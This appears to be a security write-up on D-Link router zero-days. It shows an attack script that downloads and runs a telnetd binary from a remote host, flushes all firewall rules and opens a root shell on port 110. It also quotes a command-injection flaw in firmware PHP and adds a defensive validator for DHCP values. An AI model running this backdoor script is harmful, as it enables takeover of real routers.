
Research on ten D-Link 0-day vulnerabilities (with detailed walkthrough)

Source: compiled by this site  Author: anonymous  Date: 2017-09-13
-rw-rw-rw-    1 root     root          394 Jan  1 00:00 lld2d.conf
-rw-r--r--    1 root     root          199 Jan  1 00:00 hosts
drwxr-xr-x   16 root     root          241 Jan 20  2017 ..
drwxr-xr-x   14 root     root            0 Jan  1 00:00 .
# cat re
#!/bin/sh
wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F       
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &
#
There are also several WAN RCEs. The first one is a vulnerability in /etc/services/INET/inet_ipv4.php:
$udhcpc_helper = "/var/servd/".$inf."-udhcpc.sh";
A command injection vulnerability exists from line 101 onward:
 99     fwrite(w,$udhcpc_helper,
100                 '#!/bin/sh\n'.
101                 'echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console\n'.
102                 'phpsh '.$hlper.' ACTION=$1'.
103                         ' INF='.$inf.
104                         ' INET='.$inet.
105                         ' MTU='.$mtu.
106                         ' INTERFACE=$interface'.
107                         ' IP=$ip'.
108                         ' SUBNET=$subnet'.
109                         ' BROADCAST=$broadcast'.
110                         ' LEASE=$lease'.
111                         ' "DOMAIN=$domain"'.
112                         ' "ROUTER=$router"'.
113                         ' "DNS='.$dns.'$dns"'.
114                         ' "CLSSTROUT=$clsstrout"'.
115                         ' "MSCLSSTROUT=$msclsstrout"'.
116                         ' "SSTROUT=$sstrout"'.
117                         ' "SCOPE=$scope"'.
118                         ' "WINSTYPE=$winstype"'.
119                         ' "WINS=$wins"'.
120                         ' "SIXRDPFX=$sixrd_prefix"'.
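The variables in the generated script ($ip, $subnet, $router, $domain, ...) are set by udhcpc from the DHCP server's reply, so on the WAN side they are untrusted input. The following is an added example, not code from the firmware or from the original article: a strict allow-list check that a udhcpc hook can run before passing these values to any helper. All function names are hypothetical.

```sh
#!/bin/sh
# Added example: allow-list checks for DHCP-supplied values in a udhcpc hook.
# Function names are hypothetical; they are not part of the D-Link firmware.

# Domain name: letters, digits, '.', '-' only; 1..253 chars; no leading '-' or '.'.
valid_domain() {
    [ -n "$1" ] && [ "${#1}" -le 253 ] || return 1
    case "$1" in
        *[!A-Za-z0-9.-]*) return 1 ;;   # quotes, ';', '$', '`', spaces, ...
        -*|.*) return 1 ;;
    esac
    return 0
}

# Dotted-quad IPv4: exactly four decimal octets, each 0..255.
valid_ipv4() {
    case "$1" in
        ""|*[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1            # safe to split: only digits and dots remain
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Space-separated IPv4 list ($router, $dns, $wins may carry several addresses).
# Split with parameter expansion so no value is ever glob-expanded.
valid_ipv4_list() {
    list=$1
    [ -n "$list" ] || return 1
    while :; do
        addr=${list%% *}
        valid_ipv4 "$addr" || return 1
        [ "$addr" = "$list" ] && break
        list=${list#* }
    done
    return 0
}

# Gate for the hook: succeed only if every value is well-formed.
check_lease() {   # args: ip subnet router-list domain
    valid_ipv4 "$1" && valid_ipv4 "$2" &&
        valid_ipv4_list "$3" && valid_domain "$4"
}
```

In a hook, call check_lease "$ip" "$subnet" "$router" "$domain" first and exit without acting on the lease when it fails.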
